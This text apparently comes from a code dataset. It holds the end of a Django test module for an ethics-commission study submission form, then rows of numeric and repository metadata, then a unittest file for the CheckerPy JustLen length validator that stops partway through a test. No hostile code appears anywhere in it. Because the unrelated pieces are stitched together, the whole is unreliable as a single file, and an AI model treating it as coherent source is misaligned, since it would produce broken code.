        study_plan_parallelgroups=True,
        study_plan_controlled=True,
        study_plan_cross_over=False,
        study_plan_placebo=False,
        study_plan_factorized=False,
        study_plan_pilot_project=False,
        study_plan_equivalence_testing=False,
        study_plan_misc=None,
        study_plan_number_of_groups="two sequential randomisations, each with 2 arms",
        study_plan_stratification="Age, Stage, National Groups",
        study_plan_sample_frequency=None,
        study_plan_primary_objectives="Event Free Survival",
        study_plan_null_hypothesis=False,
        study_plan_alternative_hypothesis="my thesis",
        study_plan_secondary_objectives="secondary objective",
        study_plan_alpha="0.03",
        study_plan_power="0.75",
        study_plan_statalgorithm="blabla",
        study_plan_multiple_test_correction_algorithm="",
        study_plan_dropout_ratio="0",
        study_plan_population_intention_to_treat=True,
        study_plan_population_per_protocol=False,
        study_plan_abort_crit="Peto",
        study_plan_planned_statalgorithm="log rank test",
        study_plan_dataquality_checking="None",
        study_plan_datamanagement="Datamanagement",
        study_plan_biometric_planning="Mag. rer.soc.oec. Jane Doe",
        study_plan_statistics_implementation="Mag. rer.soc.oec. Jane Doe / Statistikerin",
        #study_plan_dataprotection_anonalgoritm="Electronically generated unique patient number within SIOPEN-R-Net",
        study_plan_dataprotection_anonalgoritm="to long",
        study_plan_dataprotection_dvr="",
        study_plan_dataprotection_reason="",
        # submitter contact
        submitter_contact_gender="f",
        submitter_contact_first_name="Jane",
        submitter_contact_title="Univ. Doz. Dr.",
        submitter_contact_last_name="Doe",
        submitter_organisation="Organisation",
        submitter_jobtitle="jobtitle",
        submitter_is_coordinator=True,
        submitter_is_main_investigator=False,
        submitter_is_sponsor=False,
        submitter_is_authorized_by_sponsor=False,
        substance_registered_in_countries=[],
        substance_p_c_t_countries=['AT', 'DE', 'US'],
        presenter=presenter,
    )
    # Attach the test PDF as the form's protocol document.
    with open(TEST_PDF, 'rb') as f:
        attach_document(sform, f, 'protocol.pdf', 'protocol')
    # The test database does not ship EthicsCommission rows, so create one.
    ek1 = EthicsCommission(name='EK von Neverland')
    ek1.save()
    Investigator.objects.create(submission_form=sform, main=True, contact_last_name="Univ. Doz. Dr. Joseph doe", subject_count=1, ethics_commission=ek1)
    sform.render_pdf_document()
    return sform
class SubmissionFormTest(EcsTestCase):
    '''Tests for creating a submission form.
    Basic Tests for the modules Submission, SubmissionForm EthicsCommission, Investigator.
    '''

    def test_creation(self):
        '''Tests if a submission form can be created and saved.
        Also tests creation of an EthicsCommission and an Investigator and
        attaching the submissionform to the created EC and the Investigator.
        If a pdf of the submission form can be rendered is tested aswell.
        '''
        # The previous implementation duplicated the entire ~150-line form
        # payload from create_submission_form() verbatim.  Delegate to the
        # shared fixture helper instead: it creates the Submission and
        # SubmissionForm, the EthicsCommission and a main Investigator, and
        # calls render_pdf_document() — exactly the cases documented above.
        sform = create_submission_form()
        # A primary key proves the form was actually saved to the database.
        self.assertIsNotNone(sform.pk)
        self.assertEqual(sform.project_title, "High Risk Test Study")
        self.assertEqual(
            SubmissionForm.objects.filter(project_title="High Risk Test Study").count(), 1)
class SubmissionAttachUserTest(EcsTestCase):
    '''Tests for attaching users to a submission in different roles.
    '''

    def setUp(self):
        '''Creates a user, a sender and a submission form whose sponsor,
        investigator and submitter e-mail addresses all point at that user.'''
        self.email = 'foobar@example.com'
        self.user = create_user(self.email)
        self.sender = create_user('root@example.com')
        self.sf = create_submission_form()
        self.sf.sponsor_email = self.email
        self.sf.investigator_email = self.email
        self.sf.submitter_email = self.email
        self.user.save()
        self.sender.save()  # stray trailing semicolon removed
        self.sf.save()

    def test_submission_attach_user(self):
        '''Tests if a user can be attached to a study as submitter and as sponsor.'''
        # Link the user into every form whose submitter/sponsor e-mail matches.
        for role in ('submitter', 'sponsor'):
            lookup = {'{0}_email'.format(role): self.user.email}
            for sf in SubmissionForm.objects.filter(**lookup):
                setattr(sf, role, self.user)
                sf.save()
        # Likewise link any investigators registered under that e-mail.
        for inv in Investigator.objects.filter(email=self.user.email):
            inv.user = self.user
            inv.save()
        # Re-fetch the form to verify the assignments were persisted.
        self.sf = SubmissionForm.objects.get(project_title="High Risk Test Study")
        self.assertEqual(self.sf.sponsor, self.user)
        self.assertEqual(self.sf.submitter, self.user)

    def tearDown(self):
        # NOTE(review): self.sender and self.sf are not deleted here —
        # presumably EcsTestCase rolls back the test database; confirm.
        self.user.delete()
| 43.280612
| 156
| 0.671284
| 1,902
| 16,966
| 5.604101
| 0.196109
| 0.049536
| 0.037152
| 0.059105
| 0.810864
| 0.807111
| 0.804391
| 0.804391
| 0.804391
| 0.804391
| 0
| 0.013454
| 0.246493
| 16,966
| 391
| 157
| 43.391304
| 0.820322
| 0.04898
| 0
| 0.845714
| 0
| 0
| 0.116084
| 0.004979
| 0
| 0
| 0
| 0
| 0.005714
| 1
| 0.017143
| false
| 0
| 0.017143
| 0
| 0.045714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04119c10045cdbb307cbfbb8c52807ef4335c621
| 33,884
|
py
|
Python
|
checkerpy/tests/validators/one/test_justlen.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | 1
|
2018-01-12T19:20:51.000Z
|
2018-01-12T19:20:51.000Z
|
checkerpy/tests/validators/one/test_justlen.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
checkerpy/tests/validators/one/test_justlen.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
import logging
import unittest as ut
from collections import deque, defaultdict, OrderedDict
from ....validators.one import JustLen
from ....exceptions import LenError, IntError, CallableError
from ....types.one import _ITERABLES
from ....types.weak import _LIKE_ITERABLES
from ....functional import CompositionOf
class TestJustLenSpcification(ut.TestCase):
    """Errors raised when the *length* specification itself is invalid.

    Every case hands JustLen a length argument that cannot be converted to
    int and checks the exact IntError message.  (NOTE(review): the class
    name misspells "Specification"; kept as-is so test discovery and any
    external references are unaffected.)
    """

    def _assert_int_error(self, length, message):
        # Shared driver: the data argument is irrelevant here — only the
        # malformed length specification matters.
        with self.assertRaises(IntError) as err:
            _ = JustLen([1, 2], length=length)
        self.assertEqual(str(err.exception), message)

    def test_error_on_one_length_not_convertible_to_int(self):
        self._assert_int_error('foo', 'Could not convert given length f '
                                      'with type str to required type int!')

    def test_error_on_one_of_two_lengths_not_convertible_to_int(self):
        self._assert_int_error((3, 'bar'),
                               'Could not convert given length bar'
                               ' with type str to required type int!')

    def test_error_on_deque_not_convertible_to_int(self):
        self._assert_int_error([deque([1])],
                               'Could not convert given length '
                               'deque([1]) to required type int!')

    def test_error_on_frozenset_not_convertible_to_int(self):
        self._assert_int_error([frozenset([1])],
                               'Could not convert given length '
                               'frozenset({1}) to required type int!')

    def test_error_on_ordered_dict_not_convertible_to_int(self):
        self._assert_int_error([OrderedDict({1: 1})],
                               'Could not convert given length '
                               'OrderedDict([(1, 1)]) to required type int!')

    def test_error_on_defaultdict_not_convertible_to_int(self):
        self._assert_int_error([defaultdict(int, {1: 1})],
                               "Could not convert given length defaultdict("
                               "<class 'int'>, {1: 1}) to required type int!")

    def test_error_on_dict_keys_not_convertible_to_int(self):
        self._assert_int_error([{1: 1}.keys()],
                               'Could not convert given length '
                               'dict_keys([1]) to required type int!')

    def test_error_on_ordered_dict_keys_not_convertible_to_int(self):
        self._assert_int_error([OrderedDict({1: 1}).keys()],
                               'Could not convert given length '
                               'odict_keys([1]) to required type int!')

    def test_error_on_dict_values_not_convertible_to_int(self):
        self._assert_int_error([{1: 1}.values()],
                               'Could not convert given length '
                               'dict_values([1]) to required type int!')

    def test_error_on_ordered_dict_values_not_convertible_to_int(self):
        self._assert_int_error([OrderedDict({1: 1}).values()],
                               'Could not convert given length '
                               'odict_values([1]) to required type int!')

    def test_error_on_dict_items_not_convertible_to_int(self):
        self._assert_int_error([{1: 1}.items()],
                               'Could not convert given length '
                               'dict_items([(1, 1)]) to required type int!')

    def test_error_on_ordered_dict_items_not_convertible_to_int(self):
        self._assert_int_error([OrderedDict({1: 1}).items()],
                               'Could not convert given length '
                               'odict_items([(1, 1)]) to required type int!')
class TestJustLen(ut.TestCase):
def test_error_on_invalid_unnamed_argument(self):
log_msg = ['ERROR:root:Length of int 1 cannot be determined!']
err_msg = 'Length of int 1 cannot be determined!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(1, length=4)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_invalid_named_argument(self):
log_msg = ['ERROR:root:Length of int test cannot be determined!']
err_msg = 'Length of int test cannot be determined!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(2, 'test', length=4)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_str(self):
out = JustLen('test', length=4)
self.assertIsInstance(out, str)
self.assertEqual(out, 'test')
def test_error_on_length_of_str_not_in_lengths(self):
log_msg = ['ERROR:root:Length of str foo '
'must be one of (4, 5), not 3!']
err_msg = 'Length of str foo must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen('foo', length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_str_wrong_length(self):
log_msg = ['ERROR:root:Length of str bar must be 6, not 3!']
err_msg = 'Length of str bar must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen('bar', length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_str_wrong_length(self):
log_msg = ['ERROR:root:Length of str test must be 7, not 3!']
err_msg = 'Length of str test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen('baz', 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_tuple(self):
out = JustLen((1, 2), length=2)
self.assertTupleEqual(out, (1, 2))
def test_error_on_length_of_tuple_not_in_lengths(self):
log_msg = ['ERROR:root:Length of tuple (1, 2, 3)'
' must be one of (4, 5), not 3!']
err_msg = 'Length of tuple (1, 2, 3) must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen((1, 2, 3), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_tuple_wrong_length(self):
log_msg = ['ERROR:root:Length of tuple (1, 2, 3) must be 6, not 3!']
err_msg = 'Length of tuple (1, 2, 3) must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen((1, 2, 3), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_tuple_wrong_length(self):
log_msg = ['ERROR:root:Length of tuple test must be 7, not 3!']
err_msg = 'Length of tuple test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen((1, 2, 3), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_list(self):
out = JustLen([1, 2], length=2)
self.assertListEqual(out, [1, 2])
def test_error_on_length_of_list_not_in_lengths(self):
log_msg = ['ERROR:root:Length of list [1, 2, 3]'
' must be one of (4, 5), not 3!']
err_msg = 'Length of list [1, 2, 3] must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen([1, 2, 3], length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_list_wrong_length(self):
log_msg = ['ERROR:root:Length of list [1, 2, 3] must be 6, not 3!']
err_msg = 'Length of list [1, 2, 3] must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen([1, 2, 3], length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_list_wrong_length(self):
log_msg = ['ERROR:root:Length of list test must be 7, not 3!']
err_msg = 'Length of list test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen([1, 2, 3], 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_deque(self):
inp = deque([1, 2])
out = JustLen(inp, length=2)
self.assertIsInstance(out, type(inp))
self.assertEqual(inp, out)
def test_error_on_length_of_deque_not_in_lengths(self):
log_msg = ['ERROR:root:Length of deque([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of deque([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(deque([1, 2]), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_deque_wrong_length(self):
log_msg = ['ERROR:root:Length of deque([1, 2]) must be 6, not 2!']
err_msg = 'Length of deque([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(deque([1, 2]), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_deque_wrong_length(self):
log_msg = ['ERROR:root:Length of deque test must be 7, not 2!']
err_msg = 'Length of deque test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(deque([1, 2]), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_set(self):
out = JustLen({1, 2}, length=2)
self.assertSetEqual(out, {1, 2})
def test_error_on_length_of_set_not_in_lengths(self):
log_msg = ['ERROR:root:Length of set {1, 2, 3}'
' must be one of (4, 5), not 3!']
err_msg = 'Length of set {1, 2, 3} must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1, 2, 3}, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_set_wrong_length(self):
log_msg = ['ERROR:root:Length of set {1, 2, 3} must be 6, not 3!']
err_msg = 'Length of set {1, 2, 3} must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1, 2, 3}, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_set_wrong_length(self):
log_msg = ['ERROR:root:Length of set test must be 7, not 3!']
err_msg = 'Length of set test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1, 2, 3}, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_frozenset(self):
out = JustLen(frozenset((1, 2)), length=2)
self.assertIsInstance(out, frozenset)
self.assertSetEqual(out, frozenset((1, 2)))
def test_error_on_length_of_frozenset_not_in_lengths(self):
log_msg = ['ERROR:root:Length of frozenset({1, 2, 3})'
' must be one of (4, 5), not 3!']
err_msg = ('Length of frozenset({1, 2, 3}) '
'must be one of (4, 5), not 3!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(frozenset({1, 2, 3}), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_frozenset_wrong_length(self):
log_msg = ['ERROR:root:Length of frozenset({1, 2, 3})'
' must be 6, not 3!']
err_msg = 'Length of frozenset({1, 2, 3}) must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(frozenset({1, 2, 3}), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_frozenset_wrong_length(self):
log_msg = ['ERROR:root:Length of frozenset test must be 7, not 3!']
err_msg = 'Length of frozenset test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(frozenset({1, 2, 3}), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict(self):
out = JustLen({1: 'one', 2: 'two'}, length=2)
self.assertDictEqual(out, {1: 'one', 2: 'two'})
def test_error_on_length_of_dict_not_in_lengths(self):
log_msg = ["ERROR:root:Length of dict {1: 'one', 2: 'two'}"
" must be one of (4, 5), not 2!"]
err_msg = ("Length of dict {1: 'one', 2: 'two'}"
" must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_wrong_length(self):
log_msg = ["ERROR:root:Length of dict {1: 'one', 2: 'two'}"
" must be 6, not 2!"]
err_msg = "Length of dict {1: 'one', 2: 'two'} must be 6, not 2!"
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_wrong_length(self):
log_msg = ['ERROR:root:Length of dict test must be 7, not 2!']
err_msg = 'Length of dict test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict_keys(self):
inp = {1: 'one', 2: 'two'}
out = JustLen(inp.keys(), length=2)
self.assertIsInstance(out, type(inp.keys()))
self.assertEqual(out, inp.keys())
def test_error_on_length_of_dict_keys_not_in_lengths(self):
log_msg = ['ERROR:root:Length of dict_keys([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of dict_keys([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.keys(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_keys_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_keys([1, 2]) must be 6, not 2!']
err_msg = 'Length of dict_keys([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.keys(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_keys_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_keys test must be 7, not 2!']
err_msg = 'Length of dict_keys test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.keys(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict_values(self):
inp = {1: 'one', 2: 'two'}
out = JustLen(inp.values(), length=2)
self.assertIsInstance(out, type(inp.values()))
def test_error_on_length_of_dict_values_not_in_lengths(self):
log_msg = ['ERROR:root:Length of dict_values([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of dict_values([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.values(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_values_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_values([1, 2])'
' must be 6, not 2!']
err_msg = 'Length of dict_values([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.values(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_values_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_values test must be 7, not 2!']
err_msg = 'Length of dict_values test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.values(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict_items(self):
inp = {1: 'one', 2: 'two'}
out = JustLen(inp.items(), length=2)
self.assertIsInstance(out, type(inp.items()))
def test_error_on_length_of_dict_items_not_in_lengths(self):
log_msg = ["ERROR:root:Length of dict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!"]
err_msg = ("Length of dict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.items(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_items_wrong_length(self):
log_msg = ["ERROR:root:Length of dict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!"]
err_msg = ("Length of dict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.items(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_items_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_items test must be 7, not 2!']
err_msg = 'Length of dict_items test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.items(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_defaultdict(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
out = JustLen(inp, length=2)
self.assertDictEqual(out, inp)
def test_error_on_length_of_defaultdict_not_in_lengths(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of defaultdict(<class 'str'>, "
"{1: 'one', 2: 'two'}) must be one of (4, 5), not 2!"]
err_msg = ("Length of defaultdict(<class 'str'>, {1: 'one',"
" 2: 'two'}) must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_defaultdict_wrong_length(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of defaultdict(<class 'str'>, "
"{1: 'one', 2: 'two'}) must be 6, not 2!"]
err_msg = ("Length of defaultdict(<class 'str'>, "
"{1: 'one', 2: 'two'}) must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_defaultdict_wrong_length(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of defaultdict test must be 7, not 2!']
err_msg = 'Length of defaultdict test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordererddict(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp, length=2)
self.assertDictEqual(out, inp)
def test_error_on_length_of_ordererddict_not_in_lengths(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of OrderedDict([(1, 'one'),"
" (2, 'two')]) must be one of (4, 5), not 2!"]
err_msg = ("Length of OrderedDict([(1, 'one'), (2, "
"'two')]) must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordererddict_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of OrderedDict([(1, "
"'one'), (2, 'two')]) must be 6, not 2!"]
err_msg = ("Length of OrderedDict([(1, 'one'),"
" (2, 'two')]) must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordererddict_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of OrderedDict test must be 7, not 2!']
err_msg = 'Length of OrderedDict test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordered_dict_keys(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp.keys(), length=2)
self.assertIsInstance(out, type(inp.keys()))
self.assertEqual(out, inp.keys())
def test_error_on_length_of_ordered_dict_keys_not_in_lengths(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of odict_keys([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of odict_keys([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.keys(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordered_dict_keys_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of odict_keys([1, 2]) must be 6, not 2!']
err_msg = 'Length of odict_keys([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.keys(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordered_dict_keys_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of odict_keys test must be 7, not 2!']
err_msg = 'Length of odict_keys test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.keys(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordered_dict_values(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp.values(), length=2)
self.assertIsInstance(out, type(inp.values()))
def test_error_on_length_of_ordered_dict_values_not_in_lengths(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_values([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = ('Length of odict_values([1, 2])'
' must be one of (4, 5), not 2!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.values(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordered_dict_values_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_values([1, 2])'
' must be 6, not 2!']
err_msg = 'Length of odict_values([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.values(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordered_dict_values_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_values test must be 7, not 2!']
err_msg = 'Length of odict_values test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.values(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordered_dict_items(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp.items(), length=2)
self.assertIsInstance(out, type(inp.items()))
def test_error_on_length_of_ordered_dict_items_not_in_lengths(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ["ERROR:root:Length of odict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!"]
err_msg = ("Length of odict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.items(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordered_dict_items_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
